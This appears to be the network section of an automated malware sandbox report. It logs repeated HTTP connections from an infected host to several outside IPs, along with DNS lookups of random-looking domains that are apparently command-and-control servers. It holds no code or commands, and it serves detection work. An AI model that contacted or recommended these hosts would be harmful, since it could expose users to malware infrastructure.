Jan 11, 2025 03:29:54.639239073 CET | 80 | 49713 | 23.225.160.132 | 192.168.2.8
Jan 11, 2025 03:29:54.639327049 CET | 49713 | 80 | 192.168.2.8 | 23.225.160.132
Jan 11, 2025 03:29:55.573105097 CET | 49713 | 80 | 192.168.2.8 | 23.225.160.132
                                                                            Jan 11, 2025 03:29:56.592201948 CET4971480192.168.2.823.225.160.132
                                                                            Jan 11, 2025 03:29:56.597138882 CET804971423.225.160.132192.168.2.8
                                                                            Jan 11, 2025 03:29:56.597218990 CET4971480192.168.2.823.225.160.132
                                                                            Jan 11, 2025 03:29:56.612962008 CET4971480192.168.2.823.225.160.132
                                                                            Jan 11, 2025 03:29:56.617825985 CET804971423.225.160.132192.168.2.8
                                                                            Jan 11, 2025 03:29:57.143776894 CET804971423.225.160.132192.168.2.8
                                                                            Jan 11, 2025 03:29:57.198004961 CET4971480192.168.2.823.225.160.132
                                                                            Jan 11, 2025 03:29:57.211569071 CET804971423.225.160.132192.168.2.8
                                                                            Jan 11, 2025 03:29:57.211626053 CET4971480192.168.2.823.225.160.132
                                                                            Jan 11, 2025 03:29:58.120076895 CET4971480192.168.2.823.225.160.132
                                                                            Jan 11, 2025 03:29:59.139066935 CET4971580192.168.2.823.225.160.132
                                                                            Jan 11, 2025 03:29:59.144090891 CET804971523.225.160.132192.168.2.8
                                                                            Jan 11, 2025 03:29:59.144210100 CET4971580192.168.2.823.225.160.132
                                                                            Jan 11, 2025 03:29:59.158823967 CET4971580192.168.2.823.225.160.132
                                                                            Jan 11, 2025 03:29:59.163865089 CET804971523.225.160.132192.168.2.8
                                                                            Jan 11, 2025 03:29:59.163903952 CET804971523.225.160.132192.168.2.8
                                                                            Jan 11, 2025 03:29:59.683837891 CET804971523.225.160.132192.168.2.8
                                                                            Jan 11, 2025 03:29:59.729424000 CET4971580192.168.2.823.225.160.132
                                                                            Jan 11, 2025 03:29:59.755934954 CET804971523.225.160.132192.168.2.8
                                                                            Jan 11, 2025 03:29:59.756160975 CET4971580192.168.2.823.225.160.132
                                                                            Jan 11, 2025 03:30:00.666881084 CET4971580192.168.2.823.225.160.132
                                                                            Jan 11, 2025 03:30:01.686328888 CET4971680192.168.2.823.225.160.132
                                                                            Jan 11, 2025 03:30:01.691279888 CET804971623.225.160.132192.168.2.8
                                                                            Jan 11, 2025 03:30:01.691386938 CET4971680192.168.2.823.225.160.132
                                                                            Jan 11, 2025 03:30:01.701118946 CET4971680192.168.2.823.225.160.132
                                                                            Jan 11, 2025 03:30:01.705965996 CET804971623.225.160.132192.168.2.8
                                                                            Jan 11, 2025 03:30:02.201824903 CET804971623.225.160.132192.168.2.8
                                                                            Jan 11, 2025 03:30:02.244910002 CET4971680192.168.2.823.225.160.132
                                                                            Jan 11, 2025 03:30:02.272980928 CET804971623.225.160.132192.168.2.8
                                                                            Jan 11, 2025 03:30:02.273159981 CET4971680192.168.2.823.225.160.132
                                                                            Jan 11, 2025 03:30:02.274112940 CET4971680192.168.2.823.225.160.132
                                                                            Jan 11, 2025 03:30:02.278970957 CET804971623.225.160.132192.168.2.8
                                                                            Jan 11, 2025 03:30:07.743164062 CET4971780192.168.2.8149.88.81.190
                                                                            Jan 11, 2025 03:30:07.747992992 CET8049717149.88.81.190192.168.2.8
                                                                            Jan 11, 2025 03:30:07.748089075 CET4971780192.168.2.8149.88.81.190
                                                                            Jan 11, 2025 03:30:07.762860060 CET4971780192.168.2.8149.88.81.190
                                                                            Jan 11, 2025 03:30:07.767679930 CET8049717149.88.81.190192.168.2.8
                                                                            Jan 11, 2025 03:30:09.276304960 CET4971780192.168.2.8149.88.81.190
                                                                            Jan 11, 2025 03:30:09.322520971 CET8049717149.88.81.190192.168.2.8
                                                                            Jan 11, 2025 03:30:10.295351982 CET4971880192.168.2.8149.88.81.190
                                                                            Jan 11, 2025 03:30:10.300472021 CET8049718149.88.81.190192.168.2.8
                                                                            Jan 11, 2025 03:30:10.300968885 CET4971880192.168.2.8149.88.81.190
                                                                            Jan 11, 2025 03:30:10.317536116 CET4971880192.168.2.8149.88.81.190
                                                                            Jan 11, 2025 03:30:10.322446108 CET8049718149.88.81.190192.168.2.8
                                                                            Jan 11, 2025 03:30:11.823282003 CET4971880192.168.2.8149.88.81.190
                                                                            Jan 11, 2025 03:30:11.870630980 CET8049718149.88.81.190192.168.2.8
                                                                            Jan 11, 2025 03:30:12.841922045 CET4971980192.168.2.8149.88.81.190
                                                                            Jan 11, 2025 03:30:12.846726894 CET8049719149.88.81.190192.168.2.8
                                                                            Jan 11, 2025 03:30:12.846823931 CET4971980192.168.2.8149.88.81.190
                                                                            Jan 11, 2025 03:30:12.858727932 CET4971980192.168.2.8149.88.81.190
                                                                            Jan 11, 2025 03:30:12.863512039 CET8049719149.88.81.190192.168.2.8
                                                                            Jan 11, 2025 03:30:12.863641977 CET8049719149.88.81.190192.168.2.8
                                                                            Jan 11, 2025 03:30:14.370040894 CET4971980192.168.2.8149.88.81.190
                                                                            Jan 11, 2025 03:30:14.418533087 CET8049719149.88.81.190192.168.2.8
                                                                            Jan 11, 2025 03:30:15.389626980 CET4972080192.168.2.8149.88.81.190
                                                                            Jan 11, 2025 03:30:15.394577026 CET8049720149.88.81.190192.168.2.8
                                                                            Jan 11, 2025 03:30:15.394686937 CET4972080192.168.2.8149.88.81.190
                                                                            Jan 11, 2025 03:30:15.404853106 CET4972080192.168.2.8149.88.81.190
                                                                            Jan 11, 2025 03:30:15.409667969 CET8049720149.88.81.190192.168.2.8
                                                                            Jan 11, 2025 03:30:29.102688074 CET8049717149.88.81.190192.168.2.8
                                                                            Jan 11, 2025 03:30:29.102757931 CET4971780192.168.2.8149.88.81.190
                                                                            Jan 11, 2025 03:30:31.665040970 CET8049718149.88.81.190192.168.2.8
                                                                            Jan 11, 2025 03:30:31.665128946 CET4971880192.168.2.8149.88.81.190
                                                                            Jan 11, 2025 03:30:34.196369886 CET8049719149.88.81.190192.168.2.8
                                                                            Jan 11, 2025 03:30:34.196594000 CET4971980192.168.2.8149.88.81.190
                                                                            Jan 11, 2025 03:30:36.774013042 CET8049720149.88.81.190192.168.2.8
                                                                            Jan 11, 2025 03:30:36.774128914 CET4972080192.168.2.8149.88.81.190
                                                                            Jan 11, 2025 03:30:36.775144100 CET4972080192.168.2.8149.88.81.190
                                                                            Jan 11, 2025 03:30:36.780004025 CET8049720149.88.81.190192.168.2.8
                                                                            Jan 11, 2025 03:30:41.879708052 CET4972380192.168.2.885.159.66.93
                                                                            Jan 11, 2025 03:30:41.884731054 CET804972385.159.66.93192.168.2.8
                                                                            Jan 11, 2025 03:30:41.884830952 CET4972380192.168.2.885.159.66.93
                                                                            Jan 11, 2025 03:30:41.900368929 CET4972380192.168.2.885.159.66.93
                                                                            Jan 11, 2025 03:30:41.905308962 CET804972385.159.66.93192.168.2.8
                                                                            Jan 11, 2025 03:30:43.409204960 CET4972380192.168.2.885.159.66.93
                                                                            Jan 11, 2025 03:30:43.414478064 CET804972385.159.66.93192.168.2.8
                                                                            Jan 11, 2025 03:30:43.414586067 CET4972380192.168.2.885.159.66.93
                                                                            Jan 11, 2025 03:30:44.420207024 CET4972480192.168.2.885.159.66.93
                                                                            Jan 11, 2025 03:30:44.425364017 CET804972485.159.66.93192.168.2.8
                                                                            Jan 11, 2025 03:30:44.425472021 CET4972480192.168.2.885.159.66.93
                                                                            Jan 11, 2025 03:30:44.441673040 CET4972480192.168.2.885.159.66.93
                                                                            Jan 11, 2025 03:30:44.446639061 CET804972485.159.66.93192.168.2.8
                                                                            Jan 11, 2025 03:30:45.950345993 CET4972480192.168.2.885.159.66.93
                                                                            Jan 11, 2025 03:30:45.955713034 CET804972485.159.66.93192.168.2.8
                                                                            Jan 11, 2025 03:30:45.955895901 CET4972480192.168.2.885.159.66.93
                                                                            Jan 11, 2025 03:30:46.969343901 CET4972580192.168.2.885.159.66.93
                                                                            Jan 11, 2025 03:30:46.974447012 CET804972585.159.66.93192.168.2.8
                                                                            Jan 11, 2025 03:30:46.974524975 CET4972580192.168.2.885.159.66.93
                                                                            Jan 11, 2025 03:30:46.994822979 CET4972580192.168.2.885.159.66.93
                                                                            Jan 11, 2025 03:30:46.999708891 CET804972585.159.66.93192.168.2.8
                                                                            Jan 11, 2025 03:30:46.999815941 CET804972585.159.66.93192.168.2.8
                                                                            Jan 11, 2025 03:30:48.520762920 CET4972580192.168.2.885.159.66.93
                                                                            Jan 11, 2025 03:30:48.526042938 CET804972585.159.66.93192.168.2.8
                                                                            Jan 11, 2025 03:30:48.526165009 CET4972580192.168.2.885.159.66.93
                                                                            Jan 11, 2025 03:30:49.529361010 CET4972680192.168.2.885.159.66.93
                                                                            Jan 11, 2025 03:30:49.534615993 CET804972685.159.66.93192.168.2.8
                                                                            Jan 11, 2025 03:30:49.534701109 CET4972680192.168.2.885.159.66.93
                                                                            Jan 11, 2025 03:30:49.544825077 CET4972680192.168.2.885.159.66.93
                                                                            Jan 11, 2025 03:30:49.549854994 CET804972685.159.66.93192.168.2.8
                                                                            Jan 11, 2025 03:31:50.256149054 CET804972685.159.66.93192.168.2.8
                                                                            Jan 11, 2025 03:31:50.256272078 CET804972685.159.66.93192.168.2.8
                                                                            Jan 11, 2025 03:31:50.256479025 CET4972680192.168.2.885.159.66.93
                                                                            Jan 11, 2025 03:31:50.259459972 CET4972680192.168.2.885.159.66.93
                                                                            Jan 11, 2025 03:31:50.264295101 CET804972685.159.66.93192.168.2.8
                                                                            Jan 11, 2025 03:31:55.321760893 CET4972780192.168.2.8185.27.134.144
                                                                            Jan 11, 2025 03:31:55.328202963 CET8049727185.27.134.144192.168.2.8
                                                                            Jan 11, 2025 03:31:55.328329086 CET4972780192.168.2.8185.27.134.144
                                                                            Jan 11, 2025 03:31:55.346839905 CET4972780192.168.2.8185.27.134.144
                                                                            Jan 11, 2025 03:31:55.353174925 CET8049727185.27.134.144192.168.2.8
                                                                            Jan 11, 2025 03:31:55.938622952 CET8049727185.27.134.144192.168.2.8
                                                                            Jan 11, 2025 03:31:55.938698053 CET8049727185.27.134.144192.168.2.8
                                                                            Jan 11, 2025 03:31:55.939007998 CET4972780192.168.2.8185.27.134.144
                                                                            Jan 11, 2025 03:31:56.854850054 CET4972780192.168.2.8185.27.134.144
                                                                            Jan 11, 2025 03:31:57.873970032 CET4972880192.168.2.8185.27.134.144
                                                                            Jan 11, 2025 03:31:57.878808022 CET8049728185.27.134.144192.168.2.8
                                                                            Jan 11, 2025 03:31:57.878951073 CET4972880192.168.2.8185.27.134.144
                                                                            Jan 11, 2025 03:31:57.894366026 CET4972880192.168.2.8185.27.134.144
                                                                            Jan 11, 2025 03:31:57.899413109 CET8049728185.27.134.144192.168.2.8
                                                                            Jan 11, 2025 03:31:58.520096064 CET8049728185.27.134.144192.168.2.8
                                                                            Jan 11, 2025 03:31:58.520181894 CET8049728185.27.134.144192.168.2.8
                                                                            Jan 11, 2025 03:31:58.520385027 CET4972880192.168.2.8185.27.134.144
                                                                            Jan 11, 2025 03:31:59.401788950 CET4972880192.168.2.8185.27.134.144
                                                                            Jan 11, 2025 03:32:00.420752048 CET4972980192.168.2.8185.27.134.144
                                                                            Jan 11, 2025 03:32:00.425728083 CET8049729185.27.134.144192.168.2.8
                                                                            Jan 11, 2025 03:32:00.425827026 CET4972980192.168.2.8185.27.134.144
                                                                            Jan 11, 2025 03:32:00.442199945 CET4972980192.168.2.8185.27.134.144
                                                                            Jan 11, 2025 03:32:00.447072983 CET8049729185.27.134.144192.168.2.8
                                                                            Jan 11, 2025 03:32:00.447127104 CET8049729185.27.134.144192.168.2.8
                                                                            Jan 11, 2025 03:32:01.061295033 CET8049729185.27.134.144192.168.2.8
                                                                            Jan 11, 2025 03:32:01.061386108 CET8049729185.27.134.144192.168.2.8
                                                                            Jan 11, 2025 03:32:01.061439991 CET4972980192.168.2.8185.27.134.144
                                                                            Jan 11, 2025 03:32:01.952100039 CET4972980192.168.2.8185.27.134.144
                                                                            Jan 11, 2025 03:32:02.971195936 CET4973080192.168.2.8185.27.134.144
                                                                            Jan 11, 2025 03:32:02.976207018 CET8049730185.27.134.144192.168.2.8
                                                                            Jan 11, 2025 03:32:02.976279020 CET4973080192.168.2.8185.27.134.144
                                                                            Jan 11, 2025 03:32:02.989187956 CET4973080192.168.2.8185.27.134.144
                                                                            Jan 11, 2025 03:32:02.993982077 CET8049730185.27.134.144192.168.2.8
                                                                            Jan 11, 2025 03:32:03.584242105 CET8049730185.27.134.144192.168.2.8
                                                                            Jan 11, 2025 03:32:03.584255934 CET8049730185.27.134.144192.168.2.8
                                                                            Jan 11, 2025 03:32:03.584408998 CET4973080192.168.2.8185.27.134.144
                                                                            Jan 11, 2025 03:32:03.588278055 CET4973080192.168.2.8185.27.134.144
                                                                            Jan 11, 2025 03:32:03.593065977 CET8049730185.27.134.144192.168.2.8
                                                                            Jan 11, 2025 03:32:08.962459087 CET4973180192.168.2.8104.21.95.160
                                                                            Jan 11, 2025 03:32:08.967324972 CET8049731104.21.95.160192.168.2.8
                                                                            Jan 11, 2025 03:32:08.967416048 CET4973180192.168.2.8104.21.95.160
                                                                            Jan 11, 2025 03:32:08.983369112 CET4973180192.168.2.8104.21.95.160
                                                                            Jan 11, 2025 03:32:08.988224030 CET8049731104.21.95.160192.168.2.8
                                                                            Jan 11, 2025 03:32:09.560853004 CET8049731104.21.95.160192.168.2.8
                                                                            Jan 11, 2025 03:32:09.561559916 CET8049731104.21.95.160192.168.2.8
                                                                            Jan 11, 2025 03:32:09.561619997 CET4973180192.168.2.8104.21.95.160
                                                                            Jan 11, 2025 03:32:09.561709881 CET8049731104.21.95.160192.168.2.8
                                                                            Jan 11, 2025 03:32:09.561759949 CET4973180192.168.2.8104.21.95.160
                                                                            Jan 11, 2025 03:32:10.495572090 CET4973180192.168.2.8104.21.95.160
                                                                            Jan 11, 2025 03:32:11.514672041 CET4973280192.168.2.8104.21.95.160
                                                                            Jan 11, 2025 03:32:11.519663095 CET8049732104.21.95.160192.168.2.8
                                                                            Jan 11, 2025 03:32:11.519757986 CET4973280192.168.2.8104.21.95.160
                                                                            Jan 11, 2025 03:32:11.536220074 CET4973280192.168.2.8104.21.95.160
                                                                            Jan 11, 2025 03:32:11.542231083 CET8049732104.21.95.160192.168.2.8
                                                                            Jan 11, 2025 03:32:12.139859915 CET8049732104.21.95.160192.168.2.8
                                                                            Jan 11, 2025 03:32:12.141472101 CET8049732104.21.95.160192.168.2.8
                                                                            Jan 11, 2025 03:32:12.141540051 CET4973280192.168.2.8104.21.95.160
                                                                            Jan 11, 2025 03:32:13.042445898 CET4973280192.168.2.8104.21.95.160
                                                                            Jan 11, 2025 03:32:14.060630083 CET4973380192.168.2.8104.21.95.160
                                                                            Jan 11, 2025 03:32:14.065713882 CET8049733104.21.95.160192.168.2.8
                                                                            Jan 11, 2025 03:32:14.065809965 CET4973380192.168.2.8104.21.95.160
                                                                            Jan 11, 2025 03:32:14.079730988 CET4973380192.168.2.8104.21.95.160
                                                                            Jan 11, 2025 03:32:14.086842060 CET8049733104.21.95.160192.168.2.8
                                                                            Jan 11, 2025 03:32:14.086864948 CET8049733104.21.95.160192.168.2.8
                                                                            Jan 11, 2025 03:32:14.683618069 CET8049733104.21.95.160192.168.2.8
                                                                            Jan 11, 2025 03:32:14.684514999 CET8049733104.21.95.160192.168.2.8
                                                                            Jan 11, 2025 03:32:14.684572935 CET4973380192.168.2.8104.21.95.160
                                                                            Jan 11, 2025 03:32:15.589423895 CET4973380192.168.2.8104.21.95.160
                                                                            Jan 11, 2025 03:32:16.608807087 CET4973480192.168.2.8104.21.95.160
                                                                            Jan 11, 2025 03:32:16.613991976 CET8049734104.21.95.160192.168.2.8
                                                                            Jan 11, 2025 03:32:16.614134073 CET4973480192.168.2.8104.21.95.160
                                                                            Jan 11, 2025 03:32:16.624221087 CET4973480192.168.2.8104.21.95.160
                                                                            Jan 11, 2025 03:32:16.629141092 CET8049734104.21.95.160192.168.2.8
                                                                            Jan 11, 2025 03:32:17.220102072 CET8049734104.21.95.160192.168.2.8
                                                                            Jan 11, 2025 03:32:17.220382929 CET8049734104.21.95.160192.168.2.8
                                                                            Jan 11, 2025 03:32:17.220453024 CET4973480192.168.2.8104.21.95.160
                                                                            Jan 11, 2025 03:32:17.223109961 CET4973480192.168.2.8104.21.95.160
                                                                            Jan 11, 2025 03:32:17.227967978 CET8049734104.21.95.160192.168.2.8
                                                                            Jan 11, 2025 03:32:22.251168966 CET4973580192.168.2.8188.114.97.3
                                                                            Jan 11, 2025 03:32:22.256067991 CET8049735188.114.97.3192.168.2.8
                                                                            Jan 11, 2025 03:32:22.256388903 CET4973580192.168.2.8188.114.97.3
                                                                            Jan 11, 2025 03:32:22.275620937 CET4973580192.168.2.8188.114.97.3
                                                                            Jan 11, 2025 03:32:22.280489922 CET8049735188.114.97.3192.168.2.8
                                                                            Jan 11, 2025 03:32:23.034081936 CET8049735188.114.97.3192.168.2.8
                                                                            Jan 11, 2025 03:32:23.034868956 CET8049735188.114.97.3192.168.2.8
                                                                            Jan 11, 2025 03:32:23.035065889 CET4973580192.168.2.8188.114.97.3
                                                                            Jan 11, 2025 03:32:23.792433977 CET4973580192.168.2.8188.114.97.3
                                                                            Jan 11, 2025 03:32:24.812350988 CET4973680192.168.2.8188.114.97.3
                                                                            Jan 11, 2025 03:32:24.817358971 CET8049736188.114.97.3192.168.2.8
                                                                            Jan 11, 2025 03:32:24.817442894 CET4973680192.168.2.8188.114.97.3
                                                                            Jan 11, 2025 03:32:24.837517023 CET4973680192.168.2.8188.114.97.3
Jan 11, 2025 03:32:24.842384100 CET | 80 | 49736 | 188.114.97.3 | 192.168.2.8
Jan 11, 2025 03:32:25.593369007 CET | 80 | 49736 | 188.114.97.3 | 192.168.2.8
Jan 11, 2025 03:32:25.593872070 CET | 80 | 49736 | 188.114.97.3 | 192.168.2.8
Jan 11, 2025 03:32:25.594022989 CET | 49736 | 80 | 192.168.2.8 | 188.114.97.3
Jan 11, 2025 03:32:26.339523077 CET | 49736 | 80 | 192.168.2.8 | 188.114.97.3
Jan 11, 2025 03:32:27.358514071 CET | 49737 | 80 | 192.168.2.8 | 188.114.97.3
Jan 11, 2025 03:32:27.363375902 CET | 80 | 49737 | 188.114.97.3 | 192.168.2.8
Jan 11, 2025 03:32:27.363476992 CET | 49737 | 80 | 192.168.2.8 | 188.114.97.3
Jan 11, 2025 03:32:27.378837109 CET | 49737 | 80 | 192.168.2.8 | 188.114.97.3
Jan 11, 2025 03:32:27.383704901 CET | 80 | 49737 | 188.114.97.3 | 192.168.2.8
Jan 11, 2025 03:32:27.383836031 CET | 80 | 49737 | 188.114.97.3 | 192.168.2.8
Jan 11, 2025 03:32:28.124409914 CET | 80 | 49737 | 188.114.97.3 | 192.168.2.8
Jan 11, 2025 03:32:28.125607967 CET | 80 | 49737 | 188.114.97.3 | 192.168.2.8
Jan 11, 2025 03:32:28.125662088 CET | 49737 | 80 | 192.168.2.8 | 188.114.97.3
Jan 11, 2025 03:32:28.888137102 CET | 49737 | 80 | 192.168.2.8 | 188.114.97.3
Jan 11, 2025 03:32:29.906513929 CET | 49738 | 80 | 192.168.2.8 | 188.114.97.3
Jan 11, 2025 03:32:29.911360979 CET | 80 | 49738 | 188.114.97.3 | 192.168.2.8
Jan 11, 2025 03:32:29.911449909 CET | 49738 | 80 | 192.168.2.8 | 188.114.97.3
Jan 11, 2025 03:32:29.923579931 CET | 49738 | 80 | 192.168.2.8 | 188.114.97.3
Jan 11, 2025 03:32:29.928380966 CET | 80 | 49738 | 188.114.97.3 | 192.168.2.8
Jan 11, 2025 03:32:30.683577061 CET | 80 | 49738 | 188.114.97.3 | 192.168.2.8
Jan 11, 2025 03:32:30.684000015 CET | 80 | 49738 | 188.114.97.3 | 192.168.2.8
Jan 11, 2025 03:32:30.684067965 CET | 49738 | 80 | 192.168.2.8 | 188.114.97.3
Jan 11, 2025 03:32:30.691446066 CET | 49738 | 80 | 192.168.2.8 | 188.114.97.3
Jan 11, 2025 03:32:30.696314096 CET | 80 | 49738 | 188.114.97.3 | 192.168.2.8
Jan 11, 2025 03:32:35.728899002 CET | 49739 | 80 | 192.168.2.8 | 154.88.22.101
Jan 11, 2025 03:32:35.733818054 CET | 80 | 49739 | 154.88.22.101 | 192.168.2.8
Jan 11, 2025 03:32:35.733985901 CET | 49739 | 80 | 192.168.2.8 | 154.88.22.101
Jan 11, 2025 03:32:35.746030092 CET | 49739 | 80 | 192.168.2.8 | 154.88.22.101
Jan 11, 2025 03:32:35.750940084 CET | 80 | 49739 | 154.88.22.101 | 192.168.2.8
Jan 11, 2025 03:32:36.631516933 CET | 80 | 49739 | 154.88.22.101 | 192.168.2.8
Jan 11, 2025 03:32:36.631628990 CET | 80 | 49739 | 154.88.22.101 | 192.168.2.8
Jan 11, 2025 03:32:36.631691933 CET | 49739 | 80 | 192.168.2.8 | 154.88.22.101
Jan 11, 2025 03:32:37.262234926 CET | 49739 | 80 | 192.168.2.8 | 154.88.22.101
Jan 11, 2025 03:32:38.280610085 CET | 49740 | 80 | 192.168.2.8 | 154.88.22.101
Jan 11, 2025 03:32:38.285495043 CET | 80 | 49740 | 154.88.22.101 | 192.168.2.8
Jan 11, 2025 03:32:38.286721945 CET | 49740 | 80 | 192.168.2.8 | 154.88.22.101
Jan 11, 2025 03:32:38.302222967 CET | 49740 | 80 | 192.168.2.8 | 154.88.22.101
Jan 11, 2025 03:32:38.307013988 CET | 80 | 49740 | 154.88.22.101 | 192.168.2.8
Jan 11, 2025 03:32:39.172046900 CET | 80 | 49740 | 154.88.22.101 | 192.168.2.8
Jan 11, 2025 03:32:39.172182083 CET | 80 | 49740 | 154.88.22.101 | 192.168.2.8
Jan 11, 2025 03:32:39.172597885 CET | 49740 | 80 | 192.168.2.8 | 154.88.22.101
Jan 11, 2025 03:32:39.808187962 CET | 49740 | 80 | 192.168.2.8 | 154.88.22.101
Jan 11, 2025 03:32:40.828068972 CET | 49741 | 80 | 192.168.2.8 | 154.88.22.101
Jan 11, 2025 03:32:40.832959890 CET | 80 | 49741 | 154.88.22.101 | 192.168.2.8
Jan 11, 2025 03:32:40.833122015 CET | 49741 | 80 | 192.168.2.8 | 154.88.22.101
Jan 11, 2025 03:32:40.850877047 CET | 49741 | 80 | 192.168.2.8 | 154.88.22.101
Jan 11, 2025 03:32:40.855699062 CET | 80 | 49741 | 154.88.22.101 | 192.168.2.8
Jan 11, 2025 03:32:40.855791092 CET | 80 | 49741 | 154.88.22.101 | 192.168.2.8
Jan 11, 2025 03:32:41.713254929 CET | 80 | 49741 | 154.88.22.101 | 192.168.2.8
Jan 11, 2025 03:32:41.713272095 CET | 80 | 49741 | 154.88.22.101 | 192.168.2.8
Jan 11, 2025 03:32:41.713395119 CET | 49741 | 80 | 192.168.2.8 | 154.88.22.101
Jan 11, 2025 03:32:42.355038881 CET | 49741 | 80 | 192.168.2.8 | 154.88.22.101
Jan 11, 2025 03:32:43.374536991 CET | 49742 | 80 | 192.168.2.8 | 154.88.22.101
Jan 11, 2025 03:32:43.379476070 CET | 80 | 49742 | 154.88.22.101 | 192.168.2.8
Jan 11, 2025 03:32:43.379569054 CET | 49742 | 80 | 192.168.2.8 | 154.88.22.101
Jan 11, 2025 03:32:43.389837980 CET | 49742 | 80 | 192.168.2.8 | 154.88.22.101
Jan 11, 2025 03:32:43.394642115 CET | 80 | 49742 | 154.88.22.101 | 192.168.2.8
Jan 11, 2025 03:32:44.250277042 CET | 80 | 49742 | 154.88.22.101 | 192.168.2.8
Jan 11, 2025 03:32:44.250365973 CET | 80 | 49742 | 154.88.22.101 | 192.168.2.8
Jan 11, 2025 03:32:44.250505924 CET | 49742 | 80 | 192.168.2.8 | 154.88.22.101
Jan 11, 2025 03:32:44.253285885 CET | 49742 | 80 | 192.168.2.8 | 154.88.22.101
Jan 11, 2025 03:32:44.259727001 CET | 80 | 49742 | 154.88.22.101 | 192.168.2.8
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jan 11, 2025 03:29:00.638461113 CET | 64479 | 53 | 192.168.2.8 | 1.1.1.1
Jan 11, 2025 03:29:00.645720005 CET | 53 | 64479 | 1.1.1.1 | 192.168.2.8
Jan 11, 2025 03:29:01.799027920 CET | 49347 | 53 | 192.168.2.8 | 1.1.1.1
Jan 11, 2025 03:29:01.806207895 CET | 53 | 49347 | 1.1.1.1 | 192.168.2.8
Jan 11, 2025 03:29:37.369537115 CET | 49925 | 53 | 192.168.2.8 | 1.1.1.1
Jan 11, 2025 03:29:37.531527042 CET | 53 | 49925 | 1.1.1.1 | 192.168.2.8
Jan 11, 2025 03:29:53.201998949 CET | 52376 | 53 | 192.168.2.8 | 1.1.1.1
Jan 11, 2025 03:29:54.040798903 CET | 53 | 52376 | 1.1.1.1 | 192.168.2.8
Jan 11, 2025 03:30:07.280565977 CET | 52793 | 53 | 192.168.2.8 | 1.1.1.1
Jan 11, 2025 03:30:07.740356922 CET | 53 | 52793 | 1.1.1.1 | 192.168.2.8
Jan 11, 2025 03:30:41.780282021 CET | 64047 | 53 | 192.168.2.8 | 1.1.1.1
Jan 11, 2025 03:30:41.876156092 CET | 53 | 64047 | 1.1.1.1 | 192.168.2.8
Jan 11, 2025 03:31:55.265736103 CET | 61130 | 53 | 192.168.2.8 | 1.1.1.1
Jan 11, 2025 03:31:55.318609953 CET | 53 | 61130 | 1.1.1.1 | 192.168.2.8
Jan 11, 2025 03:32:08.593173027 CET | 51953 | 53 | 192.168.2.8 | 1.1.1.1
Jan 11, 2025 03:32:08.960033894 CET | 53 | 51953 | 1.1.1.1 | 192.168.2.8
Jan 11, 2025 03:32:22.235893965 CET | 52451 | 53 | 192.168.2.8 | 1.1.1.1
Jan 11, 2025 03:32:22.248383999 CET | 53 | 52451 | 1.1.1.1 | 192.168.2.8
Jan 11, 2025 03:32:35.702662945 CET | 60750 | 53 | 192.168.2.8 | 1.1.1.1
Jan 11, 2025 03:32:35.726413012 CET | 53 | 60750 | 1.1.1.1 | 192.168.2.8
Jan 11, 2025 03:32:49.265563011 CET | 63767 | 53 | 192.168.2.8 | 1.1.1.1
Jan 11, 2025 03:32:49.276887894 CET | 53 | 63767 | 1.1.1.1 | 192.168.2.8
Jan 11, 2025 03:33:02.573400974 CET | 49250 | 53 | 192.168.2.8 | 1.1.1.1
Jan 11, 2025 03:33:02.583733082 CET | 53 | 49250 | 1.1.1.1 | 192.168.2.8
Jan 11, 2025 03:33:11.312449932 CET | 49796 | 53 | 192.168.2.8 | 1.1.1.1
Jan 11, 2025 03:33:11.325858116 CET | 53 | 49796 | 1.1.1.1 | 192.168.2.8
Jan 11, 2025 03:33:24.502417088 CET | 64671 | 53 | 192.168.2.8 | 1.1.1.1
Jan 11, 2025 03:33:25.495989084 CET | 64671 | 53 | 192.168.2.8 | 1.1.1.1
Jan 11, 2025 03:33:26.511631966 CET | 64671 | 53 | 192.168.2.8 | 1.1.1.1
Jan 11, 2025 03:33:26.989151001 CET | 53 | 64671 | 1.1.1.1 | 192.168.2.8
Jan 11, 2025 03:33:26.989177942 CET | 53 | 64671 | 1.1.1.1 | 192.168.2.8
Jan 11, 2025 03:33:26.989207029 CET | 53 | 64671 | 1.1.1.1 | 192.168.2.8
Jan 11, 2025 03:33:40.531138897 CET | 53365 | 53 | 192.168.2.8 | 1.1.1.1
Jan 11, 2025 03:33:40.879465103 CET | 53 | 53365 | 1.1.1.1 | 192.168.2.8
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Jan 11, 2025 03:29:00.638461113 CET | 192.168.2.8 | 1.1.1.1 | 0x22d | Standard query (0) | pywolwnvd.biz | A (IP address) | IN (0x0001) | false
Jan 11, 2025 03:29:01.799027920 CET | 192.168.2.8 | 1.1.1.1 | 0xf54f | Standard query (0) | ssbzmoy.biz | A (IP address) | IN (0x0001) | false
Jan 11, 2025 03:29:37.369537115 CET | 192.168.2.8 | 1.1.1.1 | 0x56e4 | Standard query (0) | www.nb-shenshi.buzz | A (IP address) | IN (0x0001) | false
Jan 11, 2025 03:29:53.201998949 CET | 192.168.2.8 | 1.1.1.1 | 0xf478 | Standard query (0) | www.laohub10.net | A (IP address) | IN (0x0001) | false
Jan 11, 2025 03:30:07.280565977 CET | 192.168.2.8 | 1.1.1.1 | 0xa812 | Standard query (0) | www.xcvbj.asia | A (IP address) | IN (0x0001) | false
Jan 11, 2025 03:30:41.780282021 CET | 192.168.2.8 | 1.1.1.1 | 0x5c6 | Standard query (0) | www.soainsaat.xyz | A (IP address) | IN (0x0001) | false
Jan 11, 2025 03:31:55.265736103 CET | 192.168.2.8 | 1.1.1.1 | 0x6bb | Standard query (0) | www.amayavp.xyz | A (IP address) | IN (0x0001) | false
Jan 11, 2025 03:32:08.593173027 CET | 192.168.2.8 | 1.1.1.1 | 0x7da6 | Standard query (0) | www.vayui.top | A (IP address) | IN (0x0001) | false
Jan 11, 2025 03:32:22.235893965 CET | 192.168.2.8 | 1.1.1.1 | 0x7094 | Standard query (0) | www.rgenerousrs.store | A (IP address) | IN (0x0001) | false
Jan 11, 2025 03:32:35.702662945 CET | 192.168.2.8 | 1.1.1.1 | 0x4055 | Standard query (0) | www.t91rl7.pro | A (IP address) | IN (0x0001) | false
Jan 11, 2025 03:32:49.265563011 CET | 192.168.2.8 | 1.1.1.1 | 0x272c | Standard query (0) | www.learnwithus.site | A (IP address) | IN (0x0001) | false
Jan 11, 2025 03:33:02.573400974 CET | 192.168.2.8 | 1.1.1.1 | 0x514c | Standard query (0) | www.cuthethoi.online | A (IP address) | IN (0x0001) | false
